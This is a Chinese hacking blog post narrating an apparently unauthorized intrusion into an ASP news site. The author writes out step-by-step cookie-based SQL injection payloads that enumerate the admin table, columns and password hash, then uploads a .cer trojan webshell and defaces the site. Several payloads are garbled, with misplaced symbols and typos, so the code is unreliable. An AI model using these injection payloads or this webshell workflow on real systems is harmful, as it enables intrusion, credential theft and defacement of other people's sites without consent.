危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2306 浏览20612691

手工cookie注入拿到管理员权限

最近在危险漫步博客闲逛,看到有人发了一个标题为:某某站的安全检测。进去一看,只发了一个渗透成功的页面,下面的跟帖中也有几个人渗透进去了,不过都没有过程。于是我也跟着试一下,渗透时也把过程给写了出来!

首先,进入该网站,一看是asp的,注入点测试,弹出一个界面。

看来有进行sql注入过滤了,不过这种一般只是过滤了get和post注入,并没有过滤cookie注入。直接手工检测吧。。。不用工具,我都快成了工具党了。

打开一个链接,然后将“?id=137”去掉,显示没有新闻。

然后在地址栏里面输入:

:alert(document.cookie="id="+escape("137 and 1=1"));

返回有新闻的正常页面,接着输入:

:alert(document.cookie="id="+escape("137 and 1=2"));

返回无新闻页面,显然,存在了注入漏洞。

于是开始了一步一步的猜解,猜解过程比较繁琐,但是也复习了以前一些注入知识。过程如下:

猜表名:

:alert(document.cookie="id="+escape("137 and (select count(*)from admin>>0">>;

猜字段名:

:alert(document.cookie="id="+es cape("137 and (select count(password) from admin>>0">>;

:alert(document,cookie="id="+escape("137 and (select count(username) from admin>>0">>;

爆出字段长:

:alert(document.cookie="id="+escape("137 0rder by lO"));

本来想直接用union爆出管理员和密码,结果只爆出管理员名字。

:alert(document.cookie="id="+escape("137 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin">>;

那么密码就只能逐字猜解咯。。。

javastript:alert(document.cookie="id="+escape("137 and (select top 1asc(mid(password,1,1))from admin)) 97"));

一步一步,最后得到的结果是:6f9531847428f714;接下来就破解了…然后登录后台:发现后台可以拿shell的方法蛮多的,挑了一个最简单的。

里面已经被别人增加了cer,我就直接传个cer格式的木马了,过程,你懂的!

然后留下一个小小的纪念。

小小的总结一下这次的渗透吧:这次渗透,有点心急,不够细心,结果犯了两个小错误,猜密码时中间的一个值猜得太快,导致猜错还不知道,结果原地徘徊很久。还有一个比较致命的,就是没有先猜出后台登录页面,因为一些后台登录页面被管理员藏得很好,假如账号和密码都拿到了,却发现找不到登录页面,那就真的叫郁闷!!!